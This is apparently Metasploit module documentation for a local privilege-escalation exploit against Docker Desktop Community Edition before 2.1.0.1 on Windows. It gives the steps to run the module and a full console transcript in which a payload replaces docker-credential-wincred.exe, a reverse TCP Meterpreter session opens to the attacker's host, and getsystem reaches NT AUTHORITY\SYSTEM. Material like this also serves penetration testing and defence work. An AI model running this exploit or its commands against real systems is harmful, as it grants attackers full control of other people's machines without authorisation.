## Vulnerable Application

  Docker Desktop Community Edition before 2.1.0.1
  https://download.docker.com/win/stable/28905/Docker%20for%20Windows%20Installer.exe

## Verification Steps

  1. Install Docker Desktop Community Edition before 2.1.0.1
  2. Start msfconsole
  3. Get a session with basic privileges
  4. Do: ```use exploit/windows/local/docker_credential_wincred```
  5. Do: ```set SESSION <sess_no>```
  6. Do: ```run```
  7. Using an administrator cmd shell on the target, run ```docker login```
  8. You should get a shell you can elevate with ```getsystem```.

## Scenarios

### Tested on Docker Community Edition 2.0.0.0 running on Windows 10x64 Release 1803

  ```
msf5 exploit(windows/local/docker_credential_wincred) > show options

Module options (exploit/windows/local/docker_credential_wincred):

   Name         Current Setting                            Required  Description
   ----         ---------------                            --------  -----------
   PROGRAMDATA  C:\ProgramData\DockerDesktop\version-bin\  no        Path to docker version-bin.
   SESSION                                                 yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/docker_credential_wincred) > set session 1
session => 1
msf5 exploit(windows/local/docker_credential_wincred) > check

[*] Docker version 18.09.0, build 4d60db4
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/docker_credential_wincred) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Docker version 18.09.0, build 4d60db4
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Making Payload
[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Payload Upload Complete
[*] Waiting for user to attempt to login
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
